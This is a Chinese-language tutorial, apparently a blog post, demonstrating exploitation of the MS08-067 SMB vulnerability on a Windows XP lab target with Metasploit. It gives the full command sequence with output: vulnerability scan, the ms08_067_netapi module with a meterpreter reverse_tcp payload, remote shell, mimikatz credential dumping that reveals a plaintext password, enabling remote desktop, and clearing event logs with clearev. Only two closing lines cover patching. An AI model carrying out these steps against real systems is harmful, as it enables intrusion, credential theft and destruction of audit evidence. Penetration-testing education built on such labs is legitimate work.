• Metasploit MS08-067 漏洞利用演示

    • MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。此漏洞可用于进行蠕虫攻击,目前已经有利用该漏洞的蠕虫病毒。
    • 原理解析:

      • 攻击者利用windows操作系统默认开放的SMB服务445端口发送恶意代码到目标主机,通过MSRPC接口调用Server服务的一个函数,溢出栈缓冲区,获得远程代码执行权限,从而完全控制主机Windows系统主要的网络服务程序。
      • SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。
      • MSRPC网络服务

        • 这个服务能够完美的调用远程服务器上服务进程的过程。采用的网络传输层协议包括:
        • ncacn_ip_tcp  135
        • ncadg_ip_udp  135
        • ncacn_np  (TCP 139和445)主要是这个,SMB命名管道传输协议
      • server服务--支持计算机通过网络的文件、打印、和命名管道共享。如果服务停止,这些功能不可用。如果服务被禁用,任何直接依赖于此服务的服务将无法启动。
    • 漏洞利用演示

      • 演示环境

        • 靶机:Windows XP sp3 (192.168.2.6)
        • 攻击机:kali 2020 (192.168.2.3)
      • 1、首先测试一下在Kali上能够ping通靶机

      • 2、使用nmap扫描靶机是否存在MS08-067漏洞

        • nmap --script=vuln 192.168.2.6
      • 3、启动Metasploit

        • msfconsle
      • 4、搜索MS08-067的攻击模块

        • search ms8-067
        • 输出的信息一共包括6列,分别是#(模块编号)、Name(模块名称)、Disclosure Date(发布日期)、Rank(级别)、Check(是否支持检察)和Description(描述)。
      • 5、启用该攻击模块

        • use exploit/windows/smb/ms08_067_netapi
      • 6、显示攻击载荷

        • show payloads
      • 7、查看支持的目标系统

        • show targets
      • 8、设置攻击有效载荷

        • set payload windows/meterpreter/reverse_tcp
      • 9、查看Payload配置选项

        • show options
        • 输出的信息包括模块选项、Payload选项和利用的目标三部分。前两个选项信息分为四列,分别是Name(名称)、Current Setting(当前设置)、Required(需要)和Description(描述)。如果Required列的值为yes,则表示该项必须设置;如果为no,则可以不设置。
      • 10、设置RHOSTS选项

        • set RHOSTS 192.168.2.6
      • 11、实施渗透测试

        • exploit 或者 run
      • 12、Meterpreter

        • Meterpreter是Metasploit的一个扩展模块,可以调用Metasploit的一些功能,对目标系统进行更深入的渗透,如获取屏幕、上传/下载文件、创建持久后门等。
        • 1)捕获屏幕

          • meterpreter > screenshot
          • Screenshot saved to: /root/diIxqzrL.jpeg
        • 2)上传/下载文件

          • meterpreter > upload 1.txt c:\\
          • meterpreter > download c:\\1.txt
        • 3)远程桌面

          • meterpreter > run vnc
        • 4)进入目标主机shell

          • meterpreter > shell

            • Process 960 created.
            • Channel 14 created.
            • Microsoft Windows XP [Version 5.1.2600]
            • (C) Copyright 1985-2001 Microsoft Corp.
          • C:\WINDOWS\system32>exit

            • exit
        • 5)获取用户密码

          • meterpreter > load mimikatz

            • Loading extension mimikatz...Success.
          • meterpreter > mimikatz_command -f sekurlsa::wdigest -a "full"

            • "0;70234","NTLM","ping","A-3326A091E7764","
            • ping,A-3326A091E7764,abc.123"
            • "0;997","Negotiate","LOCAL SERVICE","NT AUTHORITY",""
            • "0;996","Negotiate","NETWORK SERVICE","NT AUTHORITY","
            • A-3326A091E7764$,WORKGROUP,"
            • "0;45664","NTLM","","",""
            • "0;999","NTLM","A-3326A091E7764$","WORKGROUP",""
        • 6)启用远程桌面

          • meterpreter > run post/windows/manage/enable_rdp

            • [*] Enabling Remote Desktop
            • [*] RDP is disabled; enabling it ...
            • [*] Setting Terminal Services service startup mode
            • [*] The Terminal Services service is not set to auto, changing it to auto ...
            • [*] Opening port in local firewall if necessary
            • [*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20201104235514_default_192.168.2.6_host.windows.cle_291746.txt
          • 查看远程用户的空闲时长
          • meterpreter > idletime

            • User has been idle for: 19 mins 23 secs
          • 使用rdesktop命令远程连接桌面

            • root@kali:~# rdesktop 192.168.2.6

              • Protocol(warning): process_pdu_logon(), Unhandled login infotype 1
              • Clipboard(error): xclip_handle_SelectionNotify(), unable to find a textual target to satisfy RDP clipboard text request
        • 7)清除日志

          • meterpreter > clearev

            • [*] Wiping 48 records from Application...
            • [*] Wiping 63 records from System...
            • [*] Wiping 0 records from Security...
        • 8)解决方案

          • 升级到最新的Windows系统
          • 安装KB958644补丁

Metasploit MS08-067 漏洞利用演示相关推荐

  1. 【愚公系列】2023年05月 网络安全高级班 079.Kali LinuxMetasploit渗透测试(Metasploit漏洞利用阶段)

    文章目录 前言 一.Metasploit实战 1.漏洞利用阶段 1.1 网络服务攻击 1.1.1 MS12-020(Windows服务) 1.1.2 MS08-067(Windows服务) 1.1.3 ...

  2. MS17-010 漏洞利用+修复方法

    一.实验环境 Kali:192.168.100.11 Windows 7靶机:192.168.100.12 二.漏洞复现 1.信息收集 nmap端口快速扫描 利用nmap漏洞脚本进行扫描 可以发现,靶 ...

  3. MS17-010(Eternal blue永恒之蓝)漏洞利用+修复方法

    MS17-010(Eternal blue永恒之蓝)漏洞利用+修复方法 前言 0x01 准备工作 0x02 漏洞利用 0x03 修复方案 总结 前言 提到操作系统漏洞,大家肯定听说过耳熟能详的永恒之蓝 ...

  4. 7. Vulnerability exploitation tools (漏洞利用工具 11个)

    Metasploit于2004年发布时,将风暴带入了安全世界.它是开发,测试和使用漏洞利用代码的高级开源平台. 可以将有效载荷,编码器,无操作生成器和漏洞利用的可扩展模型集成在一起,使得Metaspl ...

  5. 二进制漏洞利用原理--栈溢出

    1. 进程的内存空间 但是不管什么样的操作系统.什么样的计算机架构,进程使用的内存都可以按照功能大致分成以下4个部分. (1)代码区:这个区域存储着被装入执行的二进制机器代码,处理器会到这个区域取指并 ...

  6. MS17-010永恒之蓝漏洞利用,win32安装,windows 7 32位

    漏洞复现:MS17-010 漏洞利用的条件:1.靶机开启445端口(如果未打开该端口将会攻击失败,百度打开445端口) 2.关闭防火墙 靶机:windows 7(未知X32位还是X64位) ip:19 ...

  7. MS17-010永恒之蓝-漏洞利用+修复方法

    前言 提到操作系统漏洞,大家肯定听说过耳熟能详的永恒之蓝(MS17-010)了,他的爆发源于WannaCry勒索病毒的诞生. 该病毒是不法分子利用NSA(National Security Agenc ...

  8. Metasploit技术(三)——漏洞利用

    目录 四.漏洞利用 四.漏洞利用   每个操作系统都会存在各种Bug,像Windows这样有版权的操作系统,微软公司会快速地开发针对这些Bug或漏洞地补丁,并为用户提供更新.全世界有大量地漏洞研究人员 ...

  9. Metasploit漏洞利用基础教程要出版了

    Metasploit漏洞利用基础教程要出版了 我们的Metasploit漏洞利用基础教程已经委托机械工业出版社出版.出版书名为<从实践中学习Metasploit 5渗透测试>.预计上市时间 ...

最新文章

  1. qt试用1(Eclipse+cdt+Qt)
  2. Excel提取超链接信息
  3. springCloud学习笔记系列(1)-负载均衡Ribbon
  4. python和c-C和Python我该先学什么?
  5. Linux开发中 MD5值的计算
  6. Transformation XML(TCODE-STRANS)
  7. ios 重复引用 静态库_iOS 解决一个因三方静态库冲突产生的duplicate symbol的问题...
  8. Ubuntu搭建tftp服务器
  9. ajax中url是什么意思_装修中的阳台封窗是什么意思?
  10. mariadb数据库基础
  11. 在CMD上运行使用java命令运行java文件时出现错误:找不到或者无法加载主类的问题 解决办法
  12. 大蟒蛇Python平台相关知识
  13. 数据库查询优化-添加索引
  14. Cache数据库之ECP搭建
  15. Oracle Statistic 统计
  16. TensorFlow学习【1】--TensorFlow下载安装
  17. 一台显示器分成双屏_双屏办公,用起来到底有多爽
  18. Java学习——类和对象(上)
  19. 李子柒重回大众视野,拿回商标
  20. Java中Scanner 的用法/ Scanner怎么使用

热门文章

  1. 用python画渐变色彩的多重翅膀几何图形
  2. 使用rdp后parsec报错14003
  3. 名帖26 孙星衍 篆书《篆书轴》
  4. Photoshop(5)不一样的抠图与字体
  5. html页面右侧有缝隙,HTML解决div里面img的缝隙问题
  6. 代客户打印标签不干胶铜版纸天津
  7. 用sqlserver查询数据的所有表名和行数找到餐饮管理软件菜品表名Course
  8. 大家小心~~财付通故意留下bug给骗子留下后门
  9. HDU - 2018杭电ACM集训队单人排位赛 - 1 - Problem C. 狙击敌人
  10. PAT L2-016. 愿天下有情人都是失散多年的兄妹